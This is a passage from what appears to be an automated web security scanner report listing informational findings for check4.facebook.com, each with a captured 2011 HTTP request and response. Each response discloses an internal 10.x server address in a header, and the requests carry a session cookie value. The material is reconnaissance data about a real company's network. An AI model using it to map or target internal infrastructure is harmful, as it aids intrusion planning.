19.32. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.3.30

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7876fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.3.30
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:18 GMT

/*1308245118,171377438*/

window._ip_w["check4"] = 0;

19.33. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.223.122

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.223.122
X-Cnection: close
Date: Thu, 16 Jun 2011 12:30:40 GMT

/*1308227440,169926522*/

window._ip_w["check4"] = 0;

19.34. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.113.50

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bcdaa0cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.113.50
X-Cnection: close
Date: Thu, 16 Jun 2011 17:56:18 GMT

/*1308246978,171340082*/

window._ip_w["check4"] = 0;

19.35. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.194.40

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.194.40
X-Cnection: close
Date: Thu, 16 Jun 2011 19:03:45 GMT

/*1308251025,171360808*/

window._ip_w["check4"] = 0;

19.36. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.2.63

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.2.63
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:40 GMT

/*1308247600,171901503*/

window._ip_w["check4"] = 0;

19.37. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.169.64

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.169.64
X-Cnection: close
Date: Thu, 16 Jun 2011 17:14:57 GMT

/*1308244497,171354432*/

window._ip_w["check4"] = 0;

19.38. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.223.59

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ac8453ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.223.59
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:22 GMT

/*1308228682,171368251*/

window._ip_w["check4"] = 0;

19.39. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.91.30

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.91.30
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:49 GMT

/*1308229609,171858718*/

window._ip_w["check4"] = 0;

19.40. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.22.36

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df365585b5%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.22.36
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:08 GMT

/*1308246668,171382308*/

window._ip_w["check4"] = 0;

19.41. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.101.31

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f6560a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.101.31
X-Cnection: close
Date: Thu, 16 Jun 2011 17:56:21 GMT

/*1308246981,171336991*/

window._ip_w["check4"] = 0;

19.42. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.155.115

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.155.115
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:31 GMT

/*1308230851,169581427*/

window._ip_w["check4"] = 0;

19.43. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.142.45

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3230385f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff356d7ba3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.142.45
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:33 GMT

/*1308245433,171347501*/

window._ip_w["check4"] = 0;

19.44. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.79.45

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df108644%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.79.45
X-Cnection: close
Date: Thu, 16 Jun 2011 12:41:02 GMT

/*1308228062,171331373*/

window._ip_w["check4"] = 0;

19.45. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.166.62

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1bef9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.166.62
X-Cnection: close
Date: Thu, 16 Jun 2011 17:14:59 GMT

/*1308244499,171353662*/

window._ip_w["check4"] = 0;

19.46. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.147.25

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110d92d54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43418837&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.43.147.25
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:10 GMT

/*1308223510,170627865*/

window._ip_w["check4"] = 0;

19.47. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.34

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39c0348ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.19.34
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:30 GMT

/*1308227130,171316002*/

window._ip_w["check4"] = 0;

19.48. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.160.36

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.160.36
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:20 GMT

/*1308232400,171352100*/

window._ip_w["check4"] = 0;

19.49. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.153.41

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cfe77904%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.153.41
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:03 GMT

/*1308241083,171350313*/

window._ip_w["check4"] = 0;

19.50. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.1.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.1.31
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:38 GMT

/*1308229298,171376927*/

window._ip_w["check4"] = 0;

19.51. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.142.35

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87ebd7cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.142.35
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:12 GMT

/*1308226512,171347491*/

window._ip_w["check4"] = 0;

19.52. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.221.43

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14add876c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.221.43
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:43 GMT

/*1308234883,171367723*/

window._ip_w["check4"] = 0;

19.53. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.188.104

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.188.104
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:11 GMT

/*1308230231,176733288*/

window._ip_w["check4"] = 0;

19.54. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

